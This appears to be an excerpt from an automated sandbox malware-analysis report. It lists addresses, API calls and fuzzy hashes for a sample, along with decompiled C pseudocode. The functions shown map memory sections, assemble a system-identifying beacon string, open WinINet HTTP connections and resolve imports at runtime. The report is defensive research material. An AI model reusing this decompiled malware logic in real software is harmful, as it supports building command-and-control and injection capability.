                            0x0040134f
                            0x00401358
                            0x0040135d
                            0x00401363
                            0x0040136c
                            0x00401372
                            0x00401374
                            0x00401377
                            0x0040137c
                            0x00401383
                            0x00401383
                            0x00401387
                            0x0040138d
                            0x00401392
                            0x00000000
                            0x00000000
                            0x00401398
                            0x004013a2
                            0x004013a4
                            0x004013a7
                            0x004013aa
                            0x004013ae
                            0x004013b6
                            0x004013b8
                            0x004013bb
                            0x00401423
                            0x00401423
                            0x00401427
                            0x00000000
                            0x00000000
                            0x004013c0
                            0x004013c6
                            0x004013c8
                            0x004013db
                            0x004013de
                            0x004013de
                            0x004013de
                            0x004013e2
                            0x004013ca
                            0x004013ca
                            0x004013d2
                            0x004013d4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004013d4
                            0x004013c2
                            0x004013c2
                            0x004013d6
                            0x004013d6
                            0x004013d6
                            0x004013e5
                            0x004013e8
                            0x004013ea
                            0x004013f1
                            0x004013ec
                            0x004013ec
                            0x004013ec
                            0x004013f9
                            0x004013ff
                            0x00401401
                            0x00401431
                            0x00401403
                            0x00401403
                            0x00401406
                            0x00401408
                            0x00401410
                            0x00401410
                            0x00401415
                            0x00401417
                            0x0040141e
                            0x00401420
                            0x00401420
                            0x00401420
                            0x00000000
                            0x00401420
                            0x00000000
                            0x00401401
                            0x004013b0
                            0x004013b0
                            0x004013b4
                            0x00000000
                            0x00000000
                            0x004013b4
                            0x00401434
                            0x00401434
                            0x0040143b
                            0x00401440
                            0x00000000
                            0x00000000
                            0x00401446
                            0x00401451
                            0x00000000
                            0x00401451
                            0x00401448
                            0x00401448
                            0x0040144e
                            0x00000000
                            0x0040144e
                            0x0040137c
                            0x00401452
                            0x00401457

                            APIs
                            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401387
                            • GetProcAddress.KERNEL32(?,00000000), ref: 004013F9
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID:
                            • API String ID: 2574300362-0
                            • Opcode ID: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
                            • Instruction ID: a8434760b72dced533d6b1e45b9ae802b84f7c41c3403426f2e3ea1f70bc4997
                            • Opcode Fuzzy Hash: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
                            • Instruction Fuzzy Hash: A0310775A0121ADBDB14CF59C994AAEB7F4FF04310F24407AD902EB3A0E778EA41DB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401F78 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E00401F78(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                            0x00401f8a
                            0x00401f90
                            0x00401f9e
                            0x00401fa5
                            0x00401faa
                            0x00401fb0
                            0x00000000
                            0x00401fb1
                            0x00000000

                            APIs
                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401E07,00000002,00000000,?,?,00000000,?,?,00401E07,00000002), ref: 00401FA5
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction ID: c55f902479581699a0c324a5f7b4548b03dce4ae1f92d5d63f21deca0fc447f7
                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction Fuzzy Hash: B3F012B590420DBFDB119FA5CC85C9FBBBDEB44394B104A3AB552E11A0D6309E089A60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D3643 Relevance: 37.7, APIs: 25, Instructions: 222memorystringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 69%
                            			E006D3643(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x6da3e0; // 0x14a9be8
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x6da2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x6da018; // 0xc9f186aa
					asm("bswap eax");
					_t34 =  *0x6da014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x6da010; // 0xd8d2f808
					asm("bswap eax");
					_t36 =  *0x6da00c; // 0xeec43f25
					asm("bswap eax");
					_t37 =  *0x6da348; // 0xdcd5a8
					_t3 = _t37 + 0x6db62b; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d186, _t36, _t35, _t34, _t33,  *0x6da02c,  *0x6da004, _t112);
					_t40 = E006D1308();
					_t41 =  *0x6da348; // 0xdcd5a8
					_t4 = _t41 + 0x6db66b; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x6da348; // 0xdcd5a8
						_t8 = _t93 + 0x6db676; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x6da348; // 0xdcd5a8
					_t10 = _t45 + 0x6db2de; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E006D3DE0(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x6da348; // 0xdcd5a8
						_t12 = _t88 + 0x6db8c2; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x6da2d8, 0, _t105);
					}
					_t106 = E006D3ACA();
					if(_t106 != 0) {
						_t83 =  *0x6da348; // 0xdcd5a8
						_t14 = _t83 + 0x6db8ca; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x6da2d8, 0, _t106);
					}
					_t107 =  *0x6da3cc; // 0x14a9600
					_a20 = E006D4B69(0x6da00a, _t107 + 4);
					_t53 =  *0x6da36c; // 0x14a95b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x6da348; // 0xdcd5a8
						_t17 = _t80 + 0x6db889; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x6da2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E006D53AE(GetTickCount());
							_t59 =  *0x6da3cc; // 0x14a9600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x6da3cc; // 0x14a9600
							__imp__(_t63 + 0x40);
							_t65 =  *0x6da3cc; // 0x14a9600
							_t66 = E006D2281(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x6d9280);
								_push(_t119);
								_t71 = E006D6311();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E006D5D05(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E006D14C6();
									}
									HeapFree( *0x6da2d8, 0, _v48);
									_t109 = 0;
								}
								HeapFree( *0x6da2d8, _t109, _t119);
							}
							RtlFreeHeap( *0x6da2d8, _t109, _t116); // executed
						}
						HeapFree( *0x6da2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x6da2d8, _t109, _t98); // executed
				}
				return _v16;
			}


























































                            0x006d3643
                            0x006d3643
                            0x006d3643
                            0x006d3658
                            0x006d365a
                            0x006d365f
                            0x006d3663
                            0x006d366b
                            0x006d3671
                            0x006d3675
                            0x006d367d
                            0x006d3685
                            0x006d3685
                            0x006d3687
                            0x006d3693
                            0x006d36a2
                            0x006d36a7
                            0x006d36aa
                            0x006d36af
                            0x006d36b2
                            0x006d36b7
                            0x006d36ba
                            0x006d36c6
                            0x006d36d3
                            0x006d36d5
                            0x006d36db
                            0x006d36e0
                            0x006d36eb
                            0x006d36ed
                            0x006d36f0
                            0x006d36f6
                            0x006d36f8
                            0x006d3701
                            0x006d370c
                            0x006d370e
                            0x006d3711
                            0x006d3711
                            0x006d3713
                            0x006d3718
                            0x006d3724
                            0x006d3726
                            0x006d3729
                            0x006d372b
                            0x006d3730
                            0x006d3734
                            0x006d3736
                            0x006d373b
                            0x006d3747
                            0x006d3749
                            0x006d3755
                            0x006d3757
                            0x006d3757
                            0x006d3762
                            0x006d3766
                            0x006d3768
                            0x006d376d
                            0x006d3779
                            0x006d377b
                            0x006d3787
                            0x006d3789
                            0x006d3789
                            0x006d378f
                            0x006d37a2
                            0x006d37a6
                            0x006d37ab
                            0x006d37af
                            0x006d37b2
                            0x006d37b7
                            0x006d37c1
                            0x006d37c3
                            0x006d37ca
                            0x006d37e2
                            0x006d37e6
                            0x006d37f2
                            0x006d37f7
                            0x006d3800
                            0x006d3811
                            0x006d3815
                            0x006d381e
                            0x006d3824
                            0x006d382c
                            0x006d3831
                            0x006d383e
                            0x006d3844
                            0x006d3850
                            0x006d3856
                            0x006d3857
                            0x006d385c
                            0x006d3862
                            0x006d3868
                            0x006d386f
                            0x006d3876
                            0x006d387c
                            0x006d3883
                            0x006d3887
                            0x006d3892
                            0x006d3897
                            0x006d389d
                            0x006d38a6
                            0x006d38a6
                            0x006d38b7
                            0x006d38bd
                            0x006d38bd
                            0x006d38c7
                            0x006d38c7
                            0x006d38d5
                            0x006d38d5
                            0x006d38e6
                            0x006d38e6
                            0x006d38f4
                            0x006d38f4
                            0x006d3905

                            APIs
                            • RtlAllocateHeap.NTDLL ref: 006D366B
                            • GetTickCount.KERNEL32 ref: 006D367F
                            • wsprintfA.USER32 ref: 006D36CE
                            • wsprintfA.USER32 ref: 006D36EB
                            • wsprintfA.USER32 ref: 006D370C
                            • wsprintfA.USER32 ref: 006D3724
                            • wsprintfA.USER32 ref: 006D3747
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D3757
                            • wsprintfA.USER32 ref: 006D3779
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D3789
                            • wsprintfA.USER32 ref: 006D37C1
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 006D37DC
                            • GetTickCount.KERNEL32 ref: 006D37EC
                            • RtlEnterCriticalSection.NTDLL(014A95C0), ref: 006D3800
                            • RtlLeaveCriticalSection.NTDLL(014A95C0), ref: 006D381E
                              • Part of subcall function 006D2281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22AC
                              • Part of subcall function 006D2281: lstrlen.KERNEL32(00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22B4
                              • Part of subcall function 006D2281: strcpy.NTDLL ref: 006D22CB
                              • Part of subcall function 006D2281: lstrcat.KERNEL32(00000000,00000000), ref: 006D22D6
                              • Part of subcall function 006D2281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D22F3
                            • StrTrimA.SHLWAPI(00000000,006D9280,00000000,014A9600), ref: 006D3850
                              • Part of subcall function 006D6311: lstrlen.KERNEL32(014A9BD0,00000000,00000000,00000000,006D385C,00000000), ref: 006D6321
                              • Part of subcall function 006D6311: lstrlen.KERNEL32(?), ref: 006D6329
                              • Part of subcall function 006D6311: lstrcpy.KERNEL32(00000000,014A9BD0), ref: 006D633D
                              • Part of subcall function 006D6311: lstrcat.KERNEL32(00000000,?), ref: 006D6348
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D386F
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D3876
                            • lstrcat.KERNEL32(00000000,?), ref: 006D3883
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D3887
                              • Part of subcall function 006D5D05: WaitForSingleObject.KERNEL32(00000000,74CF81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D5DB7
                            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 006D38B7
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 006D38C7
                            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,014A9600), ref: 006D38D5
                            • HeapFree.KERNEL32(00000000,?), ref: 006D38E6
                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 006D38F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
                            • String ID:
                            • API String ID: 186568778-0
                            • Opcode ID: 8116a738976c1a40966ede526cb38612fe77b2eca1a22f29261a5a227f7b2462
                            • Instruction ID: cbfc6029e252b828750ef7d18212267d51c1e427b43d6c5eea7c4a221e54b41f
                            • Opcode Fuzzy Hash: 8116a738976c1a40966ede526cb38612fe77b2eca1a22f29261a5a227f7b2462
                            • Instruction Fuzzy Hash: DC71C571D05210AFC711AFA5EC48E973BEBEB88704B0A151BF909D7331D632DA04DB66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D7B59 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 92%
                            			E006D7B59(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				int _t53;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E006D7A71(__eax + __eax + 1);
				if(_t56 != 0) {
					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
					if(_t53 == 0) {
						E006D789E(_t56);
					} else {
						E006D789E( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E006D7AEE) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E006D2129( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x6da348; // 0xdcd5a8
						_t15 = _t59 + 0x6db73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}















                            0x006d7b59
                            0x006d7b59
                            0x006d7b64
                            0x006d7b6b
                            0x006d7b73
                            0x006d7b7d
                            0x006d7b83
                            0x006d7b8e
                            0x006d7b96
                            0x006d7ba6
                            0x006d7b98
                            0x006d7b9b
                            0x006d7ba0
                            0x006d7ba0
                            0x006d7b96
                            0x006d7bb6
                            0x006d7bbc
                            0x006d7bc1
                            0x006d7caa
                            0x00000000
                            0x006d7bdc
                            0x006d7bdf
                            0x006d7bf2
                            0x006d7bf8
                            0x006d7bfd
                            0x006d7c25
                            0x006d7c38
                            0x006d7c42
                            0x006d7c45
                            0x006d7c4b
                            0x006d7c50
                            0x00000000
                            0x00000000
                            0x006d7c54
                            0x006d7c60
                            0x006d7c71
                            0x006d7c73
                            0x006d7c84
                            0x006d7c84
                            0x006d7c94
                            0x00000000
                            0x006d7ca6
                            0x00000000
                            0x006d7ca6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d7bfd

                            APIs
                            • lstrlen.KERNEL32(?,00000008,74CB4D40), ref: 006D7B6B
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 006D7B8E
                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 006D7BB6
                            • InternetSetStatusCallback.WININET(00000000,006D7AEE), ref: 006D7BCD
                            • ResetEvent.KERNEL32(?), ref: 006D7BDF
                            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 006D7BF2
                            • GetLastError.KERNEL32 ref: 006D7BFF
                            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 006D7C45
                            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 006D7C63
                            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 006D7C84
                            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 006D7C90
                            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 006D7CA0
                            • GetLastError.KERNEL32 ref: 006D7CAA
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                            • String ID:
                            • API String ID: 2290446683-0
                            • Opcode ID: 1074ebb4965982a7f0d01457fcab36f422254508676a4b69d6e96eb923f14217
                            • Instruction ID: 7ef53837a5669c8dcaca4425da32167886b71f25b714ffefda52c197aa92a1a0
                            • Opcode Fuzzy Hash: 1074ebb4965982a7f0d01457fcab36f422254508676a4b69d6e96eb923f14217
                            • Instruction Fuzzy Hash: B3417C71D04604BFD7319FA5DD49EAF7BBAEB85B01F10492AF502E12A0F7719A04CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D7F95 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 141 6d7f95-6d7ffa 142 6d7ffc-6d8016 RaiseException 141->142 143 6d801b-6d8045 141->143 144 6d81cb-6d81cf 142->144 145 6d804a-6d8056 143->145 146 6d8047 143->146 147 6d8069-6d806b 145->147 148 6d8058-6d8063 145->148 146->145 149 6d8071-6d8078 147->149 150 6d8113-6d811d 147->150 148->147 160 6d81ae-6d81b5 148->160 154 6d8088-6d8095 LoadLibraryA 149->154 155 6d807a-6d8086 149->155 152 6d811f-6d8127 150->152 153 6d8129-6d812b 150->153 152->153 156 6d812d-6d8130 153->156 157 6d81a9-6d81ac 153->157 158 6d80d8-6d80e4 InterlockedExchange 154->158 159 6d8097-6d80a7 GetLastError 154->159 155->154 155->158 161 6d815e-6d816c GetProcAddress 156->161 162 6d8132-6d8135 156->162 157->160 165 6d810c-6d810d FreeLibrary 158->165 166 6d80e6-6d80ea 158->166 163 6d80a9-6d80b5 159->163 164 6d80b7-6d80d3 RaiseException 159->164 168 6d81c9 160->168 169 6d81b7-6d81c4 160->169 161->157 172 6d816e-6d817e GetLastError 161->172 162->161 171 6d8137-6d8142 162->171 163->158 163->164 164->144 165->150 166->150 173 6d80ec-6d80f8 LocalAlloc 166->173 168->144 169->168 171->161 174 6d8144-6d814a 171->174 176 6d818a-6d818c 172->176 177 6d8180-6d8188 172->177 173->150 178 6d80fa-6d810a 173->178 174->161 179 6d814c-6d814f 174->179 176->157 180 6d818e-6d81a6 RaiseException 176->180 177->176 178->150 179->161 181 6d8151-6d815c 179->181 180->157 181->157 181->161
                            C-Code - Quality: 51%
                            			E006D7F95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x6d0000;
				_t115 = _t139[3] + 0x6d0000;
				_t131 = _t139[4] + 0x6d0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x6d0000;
				_v16 = _t139[5] + 0x6d0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x6d0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x6da1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x6da1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x6da1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x6da1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x6da1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x6da1b8; // 0x0
										 *_t102 = _t125;
										 *0x6da1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x6da1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                            0x006d7fa4
                            0x006d7fba
                            0x006d7fc0
                            0x006d7fc2
                            0x006d7fc7
                            0x006d7fcd
                            0x006d7fd2
                            0x006d7fd5
                            0x006d7fe3
                            0x006d7fea
                            0x006d7fed
                            0x006d7ff0
                            0x006d7ff1
                            0x006d7ff4
                            0x006d7ff7
                            0x006d7ffa
                            0x006d7fff
                            0x006d800e
                            0x00000000
                            0x006d8014
                            0x006d801e
                            0x006d8028
                            0x006d802d
                            0x006d802f
                            0x006d8039
                            0x006d803c
                            0x006d803f
                            0x006d8045
                            0x006d8047
                            0x006d8047
                            0x006d804a
                            0x006d804d
                            0x006d8052
                            0x006d8056
                            0x006d8069
                            0x006d806b
                            0x006d8113
                            0x006d8113
                            0x006d811a
                            0x006d811d
                            0x006d8127
                            0x006d8127
                            0x006d812b
                            0x006d81a9
                            0x006d81ac
                            0x006d81ae
                            0x006d81ae
                            0x006d81b5
                            0x006d81b7
                            0x006d81c1
                            0x006d81c4
                            0x006d81c7
                            0x006d81c7
                            0x00000000
                            0x006d812d
